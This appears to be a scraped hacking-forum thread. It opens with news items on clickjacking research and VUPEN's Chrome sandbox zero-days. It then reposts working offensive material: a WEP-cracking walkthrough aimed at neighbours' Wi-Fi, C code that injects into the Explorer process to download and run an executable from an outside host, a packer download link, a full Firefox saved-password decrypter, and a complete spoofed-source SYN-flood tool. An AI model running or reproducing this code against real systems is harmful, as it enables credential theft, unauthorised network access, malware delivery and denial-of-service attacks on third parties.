Nytro

Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf

Two Zero Day Flaws Used To Bypass Google Chrome Security May 10, 2011 | 02:02 PM By Kelly Jackson Higgins Dark Reading French researchers say they hacked their way out of browser's sandbox, bypassed DES and ASLR Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN—which withheld technical details of the bugs in its disclosure--had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers. "We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN. A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said. Chrome's sandbox features, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack. Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox." The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar. Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data. VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine. Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox." Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen." And the hack highlights just how the sandbox—albeit an extra layer of security—is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says. Invincea's Ghosh says he expects the vulnerabilities to be exploited -- initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says. Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks. Sursa: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html

Am uitat sa precizez sursa, am actualizat primul post.

How To Crack WEP using Backtrack w/Pictures Author: Warlock This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it. Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi. What you need: Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; Downloads A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine) Patience Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd. First of all, before you do anything, navigate to the wireless assistant; Start>Internet>Wireless Assistant If you do not see any networks, then this will not work for you. Open the konsole, which is here; Now type, airmon-ng It should show you your wireless card's info, like so; Now type airmon-ng stop (your interface) Should show you this; Now type ifconfig (your interface) down Then type macchanger --mac 00:11:22:33:44:55 (your interface) This spoofs your mac address, so your victim cannot figure out who you are. Type airodump-ng (your interface) This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks) Open a new konsole Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface) Like so; It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.) Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup. Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C Now type aircrack-ng -b (bssid) (filename-01.cap) You have found the WEP key, mine being 77838557744334834238286364 (without the colons) And you're done! ~Warlock Sursa: LeetCoders

FWB++ FWB++ example by r3l4x[] (FWB stands for Firewall Bypass) /* Coder:Anskya,r3l4x[] */ #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200") #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO") #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text") #pragma comment(lib, "urlmon.lib") #include <windows.h> unsigned long inject (void *) { URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0); WinExec("C:\\xx.exe", SW_SHOW); ExitThread(0); return 0; } void Entrypoint() { DWORD Size; PBYTE module; HANDLE process; DWORD PID; LPVOID NewModule; module = (PBYTE)GetModuleHandle(0); Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage; GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID); process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); VirtualFreeEx(process, module, 0, MEM_RELEASE); NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(process, NewModule, module, Size, NULL) CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL); } Sursa: LeetCoders

Morphine Packer (C++ version) Author: holyfather This is a C/asm port to the original delphi code. Download: http://www.megaupload.com/?d=PU3FCSNN Sursa: http://leetcoders.org/showthread.php?t=167

FF pass Decrypt Firefox Password Decrypter by KriPpLer //----------------------------------------------------------------------- //////////////////////////////////////////////////////////// // Description: Firefox Password Cache Decrypter // Versions: Firefox 1, 2, and 3 // Author: KriPpLer // Language: C // Released: 9/9/2008 // URL: http://www.krippler.com/ /////////////////////////////////////////////////////////// // Credit: http://securityxploded.com/ (FF 2 Source) // Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip //////////////////////////////////////////////////////////// //----------------------------------------------------------------------- #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <userenv.h> #pragma comment(lib,"userenv.lib") //----------------------------------------------------------------------- //Firefox internal SEC structures typedef enum SECItemType { siBuffer = 0, siClearDataBuffer = 1, siCipherDataBuffer = 2, siDERCertBuffer = 3, siEncodedCertBuffer = 4, siDERNameBuffer = 5, siEncodedNameBuffer = 6, siAsciiNameString = 7, siAsciiString = 8, siDEROID = 9, siUnsignedInteger = 10, siUTCTime = 11, siGeneralizedTime = 12 }; struct SECItem { SECItemType type; unsigned char *data; unsigned int len; }; typedef enum SECStatus { SECWouldBlock = -2, SECFailure = -1, SECSuccess = 0 }; //----------------------------------------------------------------------- //Removes gecko-sdk dependency #define PRBool int #define PRUint32 unsigned int #define PR_TRUE 1 #define PR_FALSE 0 //Mozilla library names #define NSS_LIBRARY_NAME "nss3.dll" #define PLC_LIBRARY_NAME "plc4.dll" #define NSPR_LIBRARY_NAME "nspr4.dll" #define SQLITE_LIBRARY_NAME "sqlite3.dll" #define MOZCRT_LIBRARY_NAME "mozcrt19.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define PLDS_LIBRARY_NAME "plds4.dll" #define SOFTN_LIBRARY_NAME "softokn3.dll" #define LOADLIBRARY(x) LoadLibrary(x) #define GETPROCADDRESS GetProcAddress #define FREELIBRARY FreeLibrary //----------------------------------------------------------------------- const int buflen = 10240; static char readbuf[buflen+1]; static int last = 0; static int next = 0; typedef struct PK11SlotInfoStr PK11SlotInfo; // NSS Library functions typedef SECStatus (*NSS_Init) (const char *configdir); typedef SECStatus (*NSS_Shutdown) (void); typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void); typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot); typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw); typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx); typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx); // PLC Library functions typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest); // Function declarations.. void NSSUnload(); int InitFFLibs(char *firefoxPath); int InitializeNSSLibrary(char *profilePath, char *password); int CheckMasterPassword(char *password); int DirectoryExists( char *path ); void StrLwr(char *str); int OpenFile(char *filePath); void CloseFile(); int ReadLine(char *buffer, int size); char *GetFFProfilePath(); char *GetFFLibPath(); char *GetFFVersion(); char **Explode(char *StrIn,const char *Delimiter); char *Split(char *String,char Delimeter[],int Part); char *replace(char *str, const char *substr, const char *repstr); char ReadChar(); char Vers[_MAX_PATH] = ""; int version = 1; int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen); int Base64Decode(char *cryptData, char **decodeData, int *decodeLen); //----------------------------------------------------------------------- NSS_Init NSSInit = NULL; NSS_Shutdown NSSShutdown = NULL; PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL; PK11_CheckUserPassword PK11CheckUserPassword = NULL; PK11_FreeSlot PK11FreeSlot = NULL; PK11_Authenticate PK11Authenticate = NULL; PK11SDR_Decrypt PK11SDRDecrypt = NULL; PL_Base64Decode PLBase64Decode = NULL; int IsNSSInitialized = 0; HMODULE libnss = NULL; HMODULE libplc = NULL; HMODULE libtmp = NULL; FILE *signonFile = NULL; //----------------------------------------------------------------------- int OpenFile(char *filePath) { last = next = 0; signonFile = fopen(filePath, "r"); if( signonFile == NULL ) { return 0; //fail } return 1; } //----------------------------------------------------------------------- char ReadChar() { if (next >= last) { next = 0; last = fread(readbuf, 1, buflen, signonFile); if (last <= 0 ) { return 0; } } return (readbuf[next++]); } //----------------------------------------------------------------------- int ReadLine(char *buffer, int size) { unsigned int c; int strLength = 0, i=0; buffer[0] = 0; while(1) { c = ReadChar(); // eof reached if ( c == 0 ) // || feof(file) ) return 0; if (c == '\n') { buffer[strLength++] = 0; break; } if (c != '\r') { for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++) { if( strLength >= size ) { printf("\n Buffer is insufficient to store data"); return 0; } // Increase buffer capacity dynamically buffer[strLength++] = (char)c; c = c >> 8; } } } return 1; } //----------------------------------------------------------------------- //Misc functions int DirectoryExists( char *path ) { DWORD attr = GetFileAttributes(path); if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) ) { return 0; } return 1; } //----------------------------------------------------------------------- void StrLwr(char *str) { int n=strlen(str); for(int i=0; i<n; i++) { if( str[i] >=65 && str[i]<=90 ) str[i]+=32; } } //----------------------------------------------------------------------- //Loads specified firefox library with the given ffdir path as root HMODULE LoadLibrary(char *firefoxDir, char *libName) { char loadPath[4096]=""; strcpy(loadPath, firefoxDir); strcat(loadPath, "/"); strcat(loadPath, libName); libtmp = LOADLIBRARY(loadPath); if( !libtmp ) { return 0; //Failed to load library } return libtmp; } //----------------------------------------------------------------------- int InitFFLibs(char *FFDir) { libnss = libplc = NULL; //Load all required dll's if( FFDir != NULL ) { //Minor version check if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower { goto version2; } else { if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) ) { } } } } } } version2: if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) ) { libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME); if(libnss ) printf("\n\n Librarys loaded from master firefox path successfully"); } } } } } } // Now load from current path. if( !libnss ) { libnss =LOADLIBRARY(NSS_LIBRARY_NAME); libplc =LOADLIBRARY(PLC_LIBRARY_NAME); if( !libnss || !libplc ) { printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME); return 0; } } else { printf("\n Firefox Libraries loaded successfully"); } // Extract the required functions.... NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init"); NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown"); PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot"); PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot"); PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate"); PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt"); PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword"); if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) { printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME); NSSUnload(); return 0; } // Get the functions from PLC library PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode"); if( !PLBase64Decode ) { printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME); NSSUnload(); return 0; } else { printf("\n Firefox library initialized successfully"); } return 1; } //----------------------------------------------------------------------- int InitializeNSSLibrary(char *profilePath) { IsNSSInitialized = 0; // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { printf("\n\n NSSLib Initialization failed"); NSSUnload(); return 0; } else { IsNSSInitialized = 1; printf("\n NSS library initiliazed successfully"); } return 1; } //----------------------------------------------------------------------- void NSSUnload() { if( IsNSSInitialized && (NSSShutdown != NULL) ) (*NSSShutdown)(); if( libnss != NULL ) FREELIBRARY(libnss); //Free nss library if( libplc != NULL ) FREELIBRARY(libplc); //Free plc library } //----------------------------------------------------------------------- int DecryptStr(char *cryptData, char **clearData) { int decodeLen = 0; int finalLen = 0; char *decodeData = NULL; char *finalData = NULL; if( cryptData[0] != NULL ) { if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) ) { return 0; } // Do the actual PK11 decryption if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) { return 0; } *clearData = (char*) malloc( finalLen + 1 ); if( *clearData == NULL ) { printf("\n Insufficient memory"); return 0; } memcpy(*clearData, finalData, finalLen); *(*clearData + finalLen) = 0; // Null terminate string return 1; } if( Base64Decode(cryptData, clearData, &decodeLen) == 0 ) { return 0; } return 1; } //----------------------------------------------------------------------- int Base64Decode(char *cryptData, char **decodeData, int *decodeLen) { int len = strlen( cryptData ); int adjust = 0; if (cryptData[len-1] == '=') { adjust++; if (cryptData[len-2] == '=') adjust++; } *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL); if( *decodeData == NULL ) { return 0; } *decodeLen = (len*3)/4 - adjust; return 1; } //----------------------------------------------------------------------- int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen) { PK11SlotInfo *slot = 0; SECStatus status; SECItem request; SECItem reply; // Find token with SDR key slot = (*PK11GetInternalKeySlot)(); if (!slot) { return 0; } // Decrypt the string request.data = (unsigned char *)decodeData; request.len = decodeLen; reply.data = 0; reply.len = 0; status = (*PK11SDRDecrypt)(&request, &reply, NULL); if (status != SECSuccess) { return 0; } *clearData = (char*)reply.data; *finalLen = reply.len; // Free the slot (*PK11FreeSlot)(slot); return 1; } //----------------------------------------------------------------------- int DumpCache(char *profilePath,char *signonFile) { char buffer[10240]; char sbuffer[10240]; char name[10240]; char *clearData = NULL; int bufferLength = 10240; int count = 0; int ret; if( profilePath == NULL || signonFile == NULL) { return 0; } strcpy(sbuffer,profilePath); strcat(sbuffer,"\\"); strcat(sbuffer,signonFile); if(OpenFile(sbuffer) == 0 ) // Open the signon file { printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile); return 0; } else { printf("\n\n ============================================================== "); printf("\n = %s = ",signonFile); printf("\n ============================================================== "); /*///////////////////////////////////////// Begin cache dump *////////////////////////////////////////// printf("\n\n ======================= Unmanaged URLS ======================= "); // Read out the unmanaged ("Never remember" URL list ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag while (ReadLine(buffer, bufferLength) != 0) { // End of unmanaged list if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#') break; printf("\n %s ", buffer); } printf("\n ======================== Managed URLS ========================\n"); // read the URL line while (ReadLine(buffer, bufferLength) != 0 ){ printf("\n URL: %s ", buffer); //Start looping through final singon*.txt file while (ReadLine(buffer, bufferLength) != 0 ) { if (buffer[0] == '.') { printf("\n ==============================================================\n"); break; // end of cache entry } //Check if its a password if (buffer[0] == '*') { strcpy(name,&buffer[1]); ret = ReadLine(buffer, bufferLength); } else { printf("\n"); strcpy(name, buffer); ret = ReadLine(buffer, bufferLength); } if( DecryptStr(buffer, &clearData) == 1 ) { printf("\n %s: %s ", name, clearData); clearData = NULL; } } } printf("\n\n ============================================================== "); printf("\n = END %s = ",signonFile); printf("\n ============================================================== \n"); return 1; } /*///////////////////////////////////////// End pcache dump *////////////////////////////////////////// } //----------------------------------------------------------------------- // Find firefox path / libraries char *GetFFLibPath() { char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *FFDir = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox path value from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { printf("\n Unable to locate firefox installation path"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); // Remove extra quotes if( path[0] == '\"' ) { for(int i=0; i < strlen(path)-1 ; i++) path[i] = path[i+1]; } printf("\n Firefox main exe: %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } FFDir = (char*) malloc( strlen(path) + 1); if(FFDir) strcpy(FFDir, path); printf("\n Firefox path: %s", FFDir); return FFDir; } //----------------------------------------------------------------------- char *GetFFProfilePath() { char profilePath[_MAX_PATH] = ""; char partialPath[] = "Application Data\\Mozilla\\Firefox"; char profileFile[_MAX_PATH]; char line[1024]; DWORD pathSize = _MAX_PATH; char *finalProfilePath = NULL; int isDefaultFound = 0; HANDLE token; // Get current user's profile directory if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE ) { printf("\n Failed to get current process token "); return NULL; } if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE ) { printf("\n Failed to get user profile directory"); return NULL; } printf("\n User Profile directory: %s\n", profilePath); // Get firefox profile directory strcpy(profileFile, profilePath); strcat(profileFile,"\\"); strcat(profileFile,partialPath); strcat(profileFile,"\\profiles.ini"); // Open the firefox profile setting file FILE *profile = fopen(profileFile, "r"); if( profile == NULL ) { printf("\n Unable to find firefox profile file: %s ", profileFile); return NULL; } // This indicates that we are looking under default profile while(fgets(line, 1024, profile)) { StrLwr(line); if( !isDefaultFound && ( strstr(line, "name=default") != NULL) ) { isDefaultFound = 1; continue; } // Found default profile / check for path if( isDefaultFound ) { if( strstr(line,"path=") != NULL) { char *slash = strstr(line,"/"); if( slash != NULL ) *slash = '\\'; // remove \n from the end of line line[strlen(line)-1] = 0; char *start = strstr(line,"="); int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ; finalProfilePath = (char *) malloc(totalLen); if( finalProfilePath ) { strcpy(finalProfilePath,profilePath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,partialPath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,start+1); printf("\n Final profile path: %s \n", finalProfilePath); } break; } } } fclose(profile); return finalProfilePath; } //----------------------------------------------------------------------- char *GetFFVersion() { char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox"; char *FFVers = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox version from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || Vers[0] == 0) { printf("\n Path value read from the registry is empty"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); FFVers = (char*) malloc( strlen(Vers) + 1); if( FFVers ) strcpy(Vers,FFVers); if (FFVers[1] == '1') { version = 1; }else{ if (FFVers[1] == '2') { version = 2; }else{ if (FFVers[1] == '3') { version = 3; } } } printf("\n Firefox version: %d", version); return (FFVers); } //----------------------------------------------------------------------- int main(int argc, char* argv[]) { char *ProfilePath = NULL; //Profile path char *FFDir = NULL; //Firefox main installation path char buff[1024]; ProfilePath = GetFFProfilePath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox profile directory does not exist or no profiles found. \n"); return 0; } FFDir = GetFFLibPath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox installation path does not exist or is not installed. \n"); return 0; } if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { //Take 3 Mozilla dumps DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); //DumpCache(ProfilePath,"signons.sqlite"); //Dont forget to flush :/ NSSUnload(); } } printf("\n ======================= End Cache Dump =======================\n"); while(1){ Sleep(10000); //Just loop until user exits } } //----------------------------------------------------------------------- Sursa: LeetCoders

[GNU Linux C] SYN Flooder source Author: jakash3 (cred) C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled. Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data. synflood.c #include "tcpip.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <signal.h> #include <errno.h> ushort csum(short* data, int len); char* randip(char* dst); ushort rand16(); uint rand32(); int sd; void help() { printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n"); exit(1); } void quit(int sig) { close(sd); exit(0); } int main(int argc, char** argv) { if (argc!=3) help(); /* Map CTRL-C to quit() */ struct sigaction sa; sa.sa_handler = &quit; sa.sa_flags = 0; sigemptyset(&sa.sa_mask); sigaction(SIGINT, &sa, 0); char rip[16]; char packet[4096]; struct iphdr ip; struct tcpph tph; struct tcphdr tcp; struct sockaddr_in sin; const int on = 1; memset(&packet, 0, 40); ip.ihl = 5; ip.ipv = 4; ip.tos = 0; ip.len = IPHDR_LEN + TCPHDR_LEN; ip.id = htons(rand16()); ip.ttl = 64; ip.proto = IPPROTO_TCP; ip.src = (uint)inet_addr(randip(rip)); ip.dst = (uint)inet_addr(argv[1]); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tcp.sport = htons((short)atoi(argv[2])); tcp.dport = htons((short)atoi(argv[2])); tcp.seq = htonl(rand32()); tcp.offset = sizeof(struct tcphdr) / 4; tcp.flgs = TCP_SYN; tcp.chksum = 0; tph.src = ip.src; tph.dst = ip.dst; tph.zero = 0; tph.proto = IPPROTO_TCP; tph.tcp_len = sizeof(struct tcphdr); memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sd == -1) { printf("Failed to create socket. Error code: %d\n", errno); exit(1); } if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) { printf("Failed to set socket options. Error code: %d\n", errno); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(tcp.dport); memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr)); while (1) { if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) { printf("Failed to send SYN packet(s). Error code: %d\n", errno); exit(1); } else { printf("Sent SYN packet with spoofed ip: %s\n", rip); } ip.id = htons(rand16()); ip.src = (uint)inet_addr(randip(rip)); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tph.src = ip.src; tcp.seq = htonl(rand32()); tcp.chksum = 0; memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); } } ushort csum(short* data, int len) { int sum = 0; for (; len > 1; len -= 2) sum += *data++; if (len == 1) sum += *(uchar*)data; while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } /* The best I can do for generating a random ipv4 address */ char* randip(char* dst) { dst[0] = 0; int i, j, k; srandom(time(0)); srand(random()); srandom(rand()); j = rand() + random(); for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) { srand((int)dst + i + k); srand(j + dst[i+k] + (int)&i + rand()); j = rand() % 255; sprintf(dst + i, "%d.", j); } dst[i-1] = 0; return dst; } ushort rand16() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() + time(0)) % 65535; } uint rand32() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() & time(0)); } tcpip.h #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netdb.h> typedef unsigned char uchar; typedef unsigned short ushort; typedef unsigned int uint; /* Internet Datagram Header */ #define IPHDR_LEN 20 struct iphdr { uchar ipv:4; /* Internet Protocol Version */ uchar ihl:4; /* Total length (in DWORDs) */ uchar tos; /* Type of Service */ ushort len; /* Total length */ ushort id; /* Identification number */ ushort frag; /* Fragment offset and flags */ uchar ttl; /* Time to live */ uchar proto; /* Protocol type */ ushort chksum; /* Checksum */ uint src; /* Source IP Address */ uint dst; /* Destination IP Address */ }; /* TCP Header */ #define TCPHDR_LEN 20 struct tcphdr { ushort sport; /* Source Port */ ushort dport; /* Destination Port */ uint seq; /* Sequence number */ uint ack; /* Acknowledgement number */ uchar reserved:4; uchar offset:4; /* Size of TCP Header in DWORDs */ uchar flgs; /* TCP Flags */ #define TCP_FIN 0x01 #define TCP_SYN 0x02 #define TCP_RST 0x04 #define TCP_PSH 0x08 #define TCP_ACK 0x10 #define TCP_URG 0x20 ushort win; /* Window. Size of data to accept */ ushort chksum; /* Checksum */ ushort urgp; /* idk */ }; /* TCP Psuedo-header */ #define TCPPH_LEN 12 struct tcpph { uint src; uint dst; uchar zero; uchar proto; ushort tcp_len; }; Sursa: LeetCoders

